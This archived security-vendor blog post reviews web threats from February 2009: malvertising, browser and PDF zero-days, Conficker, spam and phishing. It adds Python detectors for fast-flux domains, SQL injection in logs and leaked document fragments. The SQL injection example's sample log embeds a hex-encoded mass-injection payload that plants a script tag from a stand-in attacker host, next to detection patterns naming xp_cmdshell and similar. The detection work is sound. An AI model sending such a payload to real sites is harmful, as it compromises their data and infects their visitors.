Archived Blog

This Month in the Threat Webscape

03.11.2009 - 6:30 PM


Month of February 2009

This month brings us more malvertising incidents on reputable news sites, where the threat lurks within the rotating third-party ad network. Also this month: a ton of major browser exploits (one IE exploit was reverse-engineered from Microsoft's own patch), a severe Adobe Acrobat/Reader zero-day (be careful opening that PDF!), and just about a million other security incidents scattered across the globe, once again illustrating just how dangerous Web 2.0 can be.


Major hits 

Websense discovered that the popular computer magazine eWeek was serving a malicious fake anti-virus scanner to unsuspecting visitors, although through no fault of its own: the malicious Web site reached end-users' machines through Google/DoubleClick's ad network. Google has acknowledged the existence of the malvertising scourge on its ad network. Websense alerted officials at eWeek, who worked with Google to rectify the situation immediately.

Malvertising is certainly not new, but it is quietly growing more prevalent. Cleveland.com visitors were also hit by a malvertising campaign (via tacoda.net) that is reported to be similar to another malvertising campaign on AllRecipes.com a few months ago.

Auctiva, an eBay solutions provider, had its servers compromised and served malware to its own users through the browser. According to their VP of Engineering, "The virus malware was injected via a third-party plug-in. Once in the file directory, the virus malware executed a malicious script that gained access to files. Once access was gained, the perpetrators used that access to place a low-level malicious script into files that were distributed to some of our users." You can read about the blow-by-blow ordeal for its users in more detail here.


Web 2 dot uh-oh 

Spammers and malware authors, working to a unified strategy, once again took their tactics to the Web 2.0 space, switching constantly among platforms and focusing on growing their underground economy, as illustrated by the attacks based on Twitter, Facebook and Orkut. The entire spammer and malware ecosystem was also clearly visible when spammers ramped up their siege of Digg.

Bypassing the authentication systems in place continues to let spammers and malware authors create and register fake accounts, which they use for a wide range of visual social-engineering attacks. These succeed at higher rates because they land on a trusted user base, and because the content is easily edited, mixed and matched, distributed and syndicated: Web 2.0's key selling points.

Furthermore, compromised accounts were also used to promote the fake accounts, which act as doorway pages to malicious and spam domains; instances of this were also seen on Plaxo and Microsoft Office Live Small Business. The same technique was evident in the continuing attack on Digg.


Browsing for dirt 
 
How does one go about finding vulnerabilities in software?
 
You could spend time learning how to properly "QA" the software (if you have the source code), or reverse-engineer it, applying the usual black-hat bag of tricks to find holes, which, unless the hole is fairly obvious, may be akin to finding a needle in a haystack.

However, there is a shortcut that is popular among authors of malware targeting Microsoft products. One need only wait for the second Tuesday of the month, download the security updates provided by Microsoft, and reverse-engineer the update to pinpoint exactly what changed, because that is exactly where the vulnerability is!

Internet Explorer

The trick of reverse-engineering Microsoft's security updates is not new, and is exactly what happened in the latest IE 7 attacks (MS09-002, CVE-2009-0075). Just a few days after the official Windows updates were released, black-hat hackers crafted exploits targeting the very vulnerability the update was supposed to fix.

But wait, if the patch is out, aren't we all protected? Unfortunately, it's not that simple. Many people are slow to patch, especially large corporations, because their IT departments sometimes delay distribution so they can verify that the patch does not break existing software. We call this the "window of exposure". If you visit a malicious Web site targeting this vulnerability during that window, your computer gets infected, and patching afterwards does not undo an infection that has already happened (duh!).

In this particular attack on the IE 7 vulnerability, a malicious Microsoft Word document carrying an ActiveX control was used.
 
Firefox

Mozilla's latest Firefox update patched one critical, two high, and one moderate impact vulnerability, plus two further advisories:

  • MFSA 2009-06 Directives to not cache pages ignored
  • MFSA 2009-05 XMLHttpRequest allows reading HTTPOnly cookies
  • MFSA 2009-04 (Impact: Moderate) Chrome privilege escalation via local .desktop files
  • MFSA 2009-03 (Impact: High) Local file stealing with SessionStore
  • MFSA 2009-02 (Impact: High) XSS using a chrome XBL method and window.eval
  • MFSA 2009-01 (Impact: Critical) Crashes with evidence of memory corruption (rv:1.9.0.6)

Safari

In last month's edition of our This Month in the Threat Webscape series, we mentioned the discovery of a flaw in Safari by Brian Mastenbrook (CVE-2009-0137: accessing a maliciously crafted feed: URL may lead to arbitrary code execution). Apple has now patched this vulnerability, along with a slew of other vulnerabilities in various Apple products.

Please note that this Safari vulnerability is present even when Safari is installed on Windows.

RIM BlackBerry

A quick note for corporate Crackberry addicts: RIM announced a security vulnerability in the BlackBerry Web Application Loader. If the user browses to a malicious Web site, the attacker can run code of their choice on the handheld device. The US-CERT report is here.


Acrobat show FAIL

This month the Shadowserver Foundation reported an Adobe Acrobat/Reader zero-day being actively exploited in the wild. Opening a malicious PDF file quickly compromises the computer (a backdoor Trojan is downloaded and installed). Adobe's Product Security Incident Response Team (PSIRT) confirmed the zero-day and promised a fix by March 11, 2009. The post was dated February 19, 2009. That's a 20-day window of exposure. Wow.

Some have suggested disabling JavaScript in Acrobat Reader, but that is not an air-tight mitigation: it blocks the JavaScript heap spray the in-the-wild samples rely on, not the underlying bug in PDF parsing. Read our technical analysis of this malicious PDF here (CVE-2009-0658, APSA09-01).

In other Adobe Web product news, Adobe Flash Player was patched (APSB09-01). A visitor whose browser loads a Web site hosting a maliciously crafted Flash file hands the attacker control of their computer; the malcode executes with the permissions of the logged-in user.

Now, let's not forget that Adobe Flash has almost 100% penetration worldwide ;) Ouch!


Microsoft 

February's Patch Tuesday included patches for server and client-side applications, one of which was MS09-002. Exploit code targeting CVE-2009-0075 (MS09-002) within Internet Explorer 7 was discovered in the wild. Our ThreatSeeker Network has been keeping an eye on numerous domains hosting active exploit code. The ThreatSeeker Network is also protecting against zero-day code targeting Microsoft Excel (CVE-2009-0238). A specially crafted Excel file must be opened by the user before further malicious files are dropped onto the user's machine. Websense is protecting our customers through our hosted and on-site email security offerings. No patch currently exists for this vulnerability.

Conficker/Downadup

On another front, Microsoft is still dealing with the Conficker/Downadup worm. The company has recently assembled a dedicated group from different parts of the IT industry to actively combat the outbreak, and they are not relying solely on technical solutions: Microsoft has announced a $250,000 reward for information leading to the authors of the worm. One provocative observation is that many or most of the machines compromised by the worm may be running pirated copies of Windows, as the countries with the highest software piracy rates are, in fact, the most heavily hit. The worm has already passed the 10,000,000 infected hosts milestone and is getting a lot of media attention. It also introduces some nice technical tricks as it evolves, which keeps researchers watching it closely.


How live is your journal? 



The buzz on the Internet is clearly Web 2.0, and while Web 2.0 is justifiably big news, we must not forget the issues created by blogging way back in the Web 1.5 days.

Analysis of current blogging patterns shows that traditional blogging is alive and well. The graph above shows the last posting date for blogs on BlogSpot and LiveJournal. On both blogging engines, 45% of blogs have already posted an entry this year. Given that we are only two months into the year, it is safe to assume that these blogs are active. Blogs with no post since 2008 are either dormant or belong to infrequent bloggers, and blogs with no post since 2006 or 2007 are considered no longer active. When these statistics are combined with the fact that Websense has discovered in excess of 20 million blogging sites, it is clear that there is a massive amount of volatile, blog-based content.

Fast forward to the Web 2.0 space, and we find that social networking has redefined content sharing on the public Internet. Traditional blogging assumes that we want to share our thoughts with the entire world and that the world could (might) listen. Social networking has changed the game with a "friends only" viewing model. Studies of BlogSpot show that only about 2% of bloggers restrict their blogs to invitation-only. For active blogs, real-time content-based analysis is a requirement for accurate classification.


Hello ThreatSeeker. You've got mail! 

Spammers' efforts to reach their prospective customers continue with increased creativity and complexity. The long-term battle between service providers and spammers goes on, with spammers succeeding by consistently adapting to the improvements made to combat them. This was evident when spammers once again broke Microsoft's revamped CAPTCHA.

On another front, spammers' objectives of lengthening the time a spam campaign survives and making it harder to trace back to its origins continued with Waledac's Valentine's Day theme. To this end they use randomized, complex networks, a fast-flux infrastructure in which the DNS records for the advertised domains are rotated rapidly across many compromised hosts, through which they kept advertising their malicious campaigns.
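One way a SOC can spot this kind of infrastructure from its own resolver logs is shown below. This is an added example, not Websense code or data: the domains, TTLs and addresses are constructed, and the thresholds (TTL at or under 300 seconds, at least five distinct addresses across at least three /16s, and most of each answer set being new relative to the previous one) are illustrative choices, not tuned values. Distinct /16 prefixes stand in for ASN diversity so that the check runs offline.

```python
"""Fast-flux heuristic over repeated DNS lookups.

Added example, not Websense code. The lookups below are constructed; a real
deployment would feed analyze() the answers from repeated resolver queries
(or passive DNS) for domains seen in a spam campaign.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed observations: (domain, TTL in seconds, A records returned).
SAMPLE_LOOKUPS = [
    ("valentine-card.example", 180, ["10.1.2.3", "10.9.8.7", "10.44.5.6"]),
    ("valentine-card.example", 180, ["10.77.1.1", "10.1.2.3", "10.200.3.4"]),
    ("valentine-card.example", 180, ["10.55.6.7", "10.9.8.7", "10.13.2.2"]),
    ("valentine-card.example", 180, ["10.66.1.9", "10.77.1.1", "10.3.3.3"]),
    ("www.example.com", 3600, ["192.0.2.10", "192.0.2.11"]),
    ("www.example.com", 3600, ["192.0.2.10", "192.0.2.11"]),
    ("www.example.com", 3600, ["192.0.2.10", "192.0.2.11"]),
    ("www.example.com", 3600, ["192.0.2.10", "192.0.2.11"]),
]


@dataclass
class FluxStats:
    domain: str
    lookups: int
    unique_ips: int
    unique_prefixes: int  # distinct /16s: crude offline stand-in for ASN diversity
    min_ttl: int
    churn: float          # mean fraction of each answer set unseen in the previous one
    is_fast_flux: bool


def prefix16(ip: str) -> str:
    return ".".join(ip.split(".")[:2])


def analyze(lookups, max_ttl=300, min_ips=5, min_prefixes=3, min_churn=0.3):
    """Group lookups per domain and apply the (illustrative) fast-flux thresholds."""
    by_domain = defaultdict(list)
    for domain, ttl, ips in lookups:
        by_domain[domain].append((ttl, set(ips)))

    results = {}
    for domain, obs in by_domain.items():
        all_ips = set().union(*(ips for _, ips in obs))
        prefixes = {prefix16(ip) for ip in all_ips}
        min_ttl = min(ttl for ttl, _ in obs)
        # How much of each successive answer set is new? Legitimate round-robin
        # returns the same pool; flux networks keep swapping in fresh bots.
        churns = [len(cur - prev) / len(cur)
                  for (_, prev), (_, cur) in zip(obs, obs[1:])]
        churn = sum(churns) / len(churns) if churns else 0.0
        flagged = (min_ttl <= max_ttl and len(all_ips) >= min_ips
                   and len(prefixes) >= min_prefixes and churn >= min_churn)
        results[domain] = FluxStats(domain, len(obs), len(all_ips),
                                    len(prefixes), min_ttl, churn, flagged)
    return results


if __name__ == "__main__":
    for stats in analyze(SAMPLE_LOOKUPS).values():
        print(stats)
```

Low TTL alone is not evidence (CDNs use short TTLs too); it is the combination of low TTL, a large and widely spread address pool, and constant turnover between answers that separates a flux network from ordinary load balancing.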

Visual social engineering tactics are also being consistently adapted by spammers to increase the success of their attacks, as was evident in the Skype Valentine spam lure, the Walmart fake survey emails, and spam campaigns with malicious zip attachments that appeared to use a spoofed-forward technique.


So long and thanks for all the phish 

Increasingly frustrated and desperate phishers are targeting GTalk and Gmail accounts. The attack aims to steal Google usernames and passwords; unlike previous long-tail phishing attacks, this one has strong monetary ties, as Google credentials can be used in Google Checkout and Google AdSense. The victim receives a GTalk IM with a TinyURL link that redirects to a ViddyHo login page.

Researchers from Harvard and Cambridge estimate that 75.8% of phishing sites are hosted on compromised servers. It is possible that phishers obtain access to such servers using Google hacking techniques. The efficacy of such techniques is notable given that most SQL injection attacks in 2008 performed automatic search engine reconnaissance.
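The reconnaissance-then-inject pattern leaves traces in ordinary web server logs. The following is an added example, not Websense code: it parses Apache combined-format lines, URL-decodes the request (twice, since bots often double-encode), expands the hex literals that mass-injection kits of the period wrapped in CAST(...) so the real payload can be inspected, and flags search-engine dorks in the Referer. The log lines, addresses, payload and regular expressions are constructed for illustration.

```python
"""Spotting automated SQL injection, and the search-engine reconnaissance that
precedes it, in web server logs. Added example, not Websense code."""
import re
from urllib.parse import unquote_plus

# Constructed stand-in for the hex-encoded T-SQL that mass-injection bots pushed
# into vulnerable ASP pages: it appends a script tag to every row of a table.
_INJECTED_SQL = ("UPDATE products SET descr = descr + "
                 "'<script src=\"http://bad.example/x.js\"></script>'")
_HEX_BLOB = "0x" + _INJECTED_SQL.encode().hex()

# Constructed Apache combined-format lines; IPs are from RFC 5737 test ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Feb/2009:10:12:01 +0000] "GET /products.asp?id=12 HTTP/1.1" '
    '200 5120 "http://www.google.com/search?q=inurl%3Aproducts.asp%3Fid%3D" "Mozilla/4.0"',
    '203.0.113.5 - - [19/Feb/2009:10:12:03 +0000] "GET /products.asp?id=12;DECLARE%20@S'
    '%20VARCHAR(4000);SET%20@S=CAST(' + _HEX_BLOB + '%20AS%20VARCHAR(4000));EXEC(@S);-- '
    'HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [19/Feb/2009:10:13:40 +0000] "GET /products.asp?id=13 HTTP/1.1" '
    '200 4870 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SQL_RE = re.compile(
    r"(?i)\b(declare|cast|exec|union\s+select|xp_cmdshell|waitfor\s+delay)\b"
    r"|'\s*(or|and)\s+[^=]+=|;\s*--|--\s*$"
)
HEX_RE = re.compile(r"0x([0-9a-fA-F]{16,})")
DORK_RE = re.compile(r"(?i)\b(inurl|intitle|intext|filetype):")


def decode_request(target: str):
    """URL-decode (up to twice) and expand embedded hex literals to text."""
    text = target
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    blobs = []
    for m in HEX_RE.finditer(text):
        try:
            blobs.append(bytes.fromhex(m.group(1)).decode("utf-8", "replace"))
        except ValueError:  # odd-length hex run, not a real literal
            pass
    return text, blobs


def scan_log(lines):
    """Return one finding per suspicious line, with the reasons it was flagged."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        text, blobs = decode_request(m["target"])
        reasons = []
        if SQL_RE.search(text):
            reasons.append("sql-keywords-in-request")
        for blob in blobs:
            if SQL_RE.search(blob) or "<script" in blob.lower():
                reasons.append("hex-payload:" + blob[:60])
        if DORK_RE.search(unquote_plus(m["referer"])):
            reasons.append("search-dork-in-referer")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "request": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["reasons"])
```

The dork-in-Referer check is the reconnaissance half: a request arriving straight from a search results page for `inurl:products.asp?id=` is a page that the search engine has advertised as injectable, and it is worth reviewing even before an injection attempt follows from the same address.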

 

As the filing deadline for taxpayers moves closer, phishers are sending more IRS phish. This time, the attack asks the victim to download and submit a stimulus payment form.

The ThreatSeeker Network also discovered numerous newly registered fake securities Web sites in China. These phishing sites host false information about stocks and negotiable securities under the names of some of the big securities Web sites, and attempt to deceive people into paying for information or registering for a stock analysis service.


Data Leakage Prevention

Perfect Storm: Leaky Apps, More Electronic Records

 

Call it a perfect storm, or a train wreck, whatever you like. But the writing is on the wall. Web 2.0 and other technologies are adding any number and type of applications to our internetworked soup, creating not only more avenues for communication but also more opportunities for deliberate or inadvertent data leaks. On top of that, we're seeing large-scale trends to digitize traditionally hard-copy data to improve automation, which makes data leaks and theft more likely, because it's 'just in a file' that can be accessed from virtually anywhere.

News broke on Monday that detailed blueprints were leaked from a government contractor's laptop on which P2P file-sharing software was installed. The data was pilfered by a hacker who monitors these P2P networks. But safeguards could have been in place above and beyond the public P2P monitoring service from Tiversa that initially discovered the breach. In short, fingerprinting the sensitive data and then regularly discovering it across servers and employee and contractor laptops would have kept a current inventory of where all the data (e.g. blueprints, or *portions* thereof) lives, enabling investigators to determine where the leak originated (after the fact) and enabling IT administrators to determine which systems need further securing (before the fact). To catch the leak itself, real-time monitoring of communications channels at the endpoint (data in use) and on the network (data in motion) would catch the use of P2P or other applications to transmit this data.
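Fingerprinting that still fires on "portions thereof" is usually done by hashing overlapping word windows (shingles) of the sensitive document and looking those hashes up in anything that crosses a channel. The following is an added example, not Websense's DLP engine: the "drawing" text is invented, the six-word window and the three-shingle alert threshold are illustrative, and a real deployment would keep the fingerprint index where the inspected content cannot reach it.

```python
"""Partial-content fingerprinting for leak detection. Added example, not
Websense code; the sensitive document and e-mails below are constructed."""
import hashlib
import re
from collections import defaultdict

K = 6  # words per shingle; smaller k catches shorter excerpts but raises false positives

# Constructed stand-in for a sensitive engineering document. Nothing here is real.
SENSITIVE_DOCS = {
    "rotor-hub-drawing-revC": (
        "Main rotor hub assembly drawing revision C. Blade root attachment uses twelve "
        "titanium bolts torqued to 480 inch pounds. Elastomeric bearing clearance must be "
        "held within two thousandths of an inch across the full pitch range. Swashplate "
        "actuator stroke is limited to 3.25 inches by the upper stop."
    ),
}

# Constructed traffic: one mail quoting a 17-word excerpt, one unrelated mail.
EMAIL_WITH_EXCERPT = ("FYI here is the key bit: Elastomeric bearing clearance must be "
                      "held within two thousandths of an inch across the full pitch "
                      "range. Let me know.")
CLEAN_EMAIL = ("Lunch on Friday? The new place on Fifth Street has a good special "
               "and the patio is open.")


def tokens(text):
    """Normalise so that case, punctuation and line breaks do not defeat matching."""
    return re.findall(r"[a-z0-9]+", text.lower())


def shingles(text, k=K):
    """Yield a short hash for every k-word window of the text."""
    words = tokens(text)
    for i in range(len(words) - k + 1):
        window = " ".join(words[i:i + k])
        yield hashlib.sha1(window.encode()).hexdigest()[:16]


def build_index(docs, k=K):
    """fingerprint -> set of document ids; only hashes leave the secure side."""
    index = defaultdict(set)
    for doc_id, text in docs.items():
        for fp in shingles(text, k):
            index[fp].add(doc_id)
    return index


INDEX = build_index(SENSITIVE_DOCS)


def scan(text, index=INDEX, k=K, threshold=3):
    """Count how many windows of `text` match each fingerprinted document."""
    hits = defaultdict(int)
    total = 0
    for fp in shingles(text, k):
        total += 1
        for doc_id in index.get(fp, ()):
            hits[doc_id] += 1
    return {"total_shingles": total, "hits": dict(hits),
            "flagged": any(n >= threshold for n in hits.values())}


if __name__ == "__main__":
    print(scan(EMAIL_WITH_EXCERPT))
    print(scan(CLEAN_EMAIL))
```

A 17-word excerpt contributes 12 matching six-word windows even though the surrounding mail is unrelated, which is why this approach survives the "just a portion" case that whole-file hashing misses; the same index, run over file shares and laptops, gives the inventory of where the data lives.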

 

Shoulda, woulda, coulda.

 

But this wasn’t the only newsworthy item to us. There was a small but significant ‘nudge’ in the multi-digit, no-such-thing-as-a-free-lunch stimulus program. Continuing the directive from the previous Bush administration in 2004, the new Obama administration has supported a $21M infusion to establish e-health records for most Americans by 2014. Yes, that’s only five years away. And with today’s population estimated at 305,940,982 and projected to grow to 309,753,000 (PDF), we’re talking about at least that many records, accounting for multiple records per patient, multiple doctors and even correcting for the (sad to say) uninsured. This all becomes significant with the existing HIPAA regulations in place to protect PHI (Protected Health Information), including diagnosis codes, prescription information, pre-existing conditions, etc. Protecting the privacy of patients requires the same type of technology required to protect sensitive business data such as the blueprints of POTUS’ helicopter. Identifying HIPAA data with templates for PHI and monitoring communications on a broad scale can limit the risk of a HIPAA violation and prevent fines or lawsuits by patient victims.

 

So can we possibly keep tabs on these new channels for communication, and therefore data leaks, while securing our most precious data, including those addressing matters of national security? And can we keep up with the growing volume of electronic health records, containing PHI and therefore requiring HIPAA compliance?

 

Yes we can!



Security Trends 

Like all things shiny and fast-growing in Web 2.0, Twitter has attracted a ton of unwanted attention from modern-day cyber-criminals. This month, ZDNet reports on a commercial spamming tool called Tweet Tornado. This dodgy tool does just what it sounds like: it creates massive numbers of Twitter accounts automatically and bombards other Twitter users with messages (most likely not the kind you like).

CanSecWest's Pwn2Own (a white-hat hacking contest) has announced that this year's contest will focus on two sets of technologies: Web browsers and mobile devices. Good call, because that's where attacks are now taking place: over the Web. As mobile applications become more tethered to the Web, or more 'iPhone-class' as Walt Mossberg would put it, forward-looking cyber-criminals are beginning to recognize this adjacent Blue Ocean as a plausible target market to steal more valuable information and increase the size of their botnets.



Thanks to the following contributors for this month's roundup:

  • Gargi Mitra (Data Loss Prevention)
  • Mark Haffenden (Advanced Content Research)
  • Sumeet Prasad (Security & Technology Research)
  • Saeed Abu-Nimeh (Security & Technology Research)
  • Carl Leonard (Security & Technology Research) 
  • Elad Sharf (Security & Technology Research) 
  • Jay Liew (Security & Technology Research) 



